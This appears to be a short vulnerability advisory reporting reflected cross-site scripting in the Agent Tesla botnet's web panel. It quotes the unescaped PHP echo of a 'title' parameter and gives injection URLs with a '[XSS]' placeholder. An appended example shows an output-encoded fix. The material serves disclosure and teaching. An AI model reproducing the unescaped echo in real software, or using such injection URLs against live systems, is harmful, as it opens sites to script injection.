################################
# Exploit Title: Agent Tesla Botnet - Cross Site Scripting Vulnerability
# Google Dork: n/a
# Date: 29/10/2020
# Exploit Author: n4pst3r
# Vendor Homepage: unkn0wn
# Software Link: http://www.agenttesla.com/ ¡ Down !
# Version: unkn0wn
# Tested on: Windows 10, debian 7
# CVE : n/a
################################
# Vuln-Code: http://127.0.0.1/WebPanel/pages/get-log.php
/get-screens.php
/get-webcams.php
<?php echo $_GET['title']; ?>
################################
PoC:
http://127.0.0.1/WebPanel/pages/get-log.php?title=[XSS]
/get-screens.php?title=[XSS]
/get-webcams.php?title=[XSS]
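
Added example, not part of the original advisory or of the panel's code: the unescaped echo listed under Vuln-Code beside an output-encoded form of the same operation. The helper name safe_title, the 120-byte length cap and the sample inputs are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern quoted in the advisory (reflects the parameter as-is):
//     echo $_GET['title'];

// Hypothetical helper: returns the "title" query parameter encoded for an
// HTML text node or a quoted attribute value.
function safe_title(array $query, int $maxLen = 120): string
{
    $raw = $query['title'] ?? '';

    // A request such as ?title[]=x makes PHP deliver an array here.
    // Treat anything that is not a string as an empty title.
    if (!is_string($raw)) {
        return '';
    }

    // Bound the reflected value. substr() counts bytes and may cut a
    // multi-byte character; ENT_SUBSTITUTE below replaces the broken
    // tail with U+FFFD instead of returning an empty string.
    $raw = substr($raw, 0, $maxLen);

    // ENT_QUOTES encodes both ' and " so the result is also safe inside
    // a quoted attribute; the charset is pinned so encoding does not
    // depend on the server's default_charset setting.
    return htmlspecialchars(
        $raw,
        ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5,
        'UTF-8'
    );
}

// Constructed sample inputs standing in for $_GET.
$samples = [
    ['title' => 'Logs for host-01'],
    ['title' => '<b>bold</b> & "quoted"'],
    ['title' => ['nested']],
    [],
];

foreach ($samples as $query) {
    // In a page this would be: echo safe_title($_GET);
    echo safe_title($query), PHP_EOL;
}
```

This encoding covers HTML text and quoted-attribute contexts only; a value written into a script block, a URL or a style attribute needs the encoder for that context.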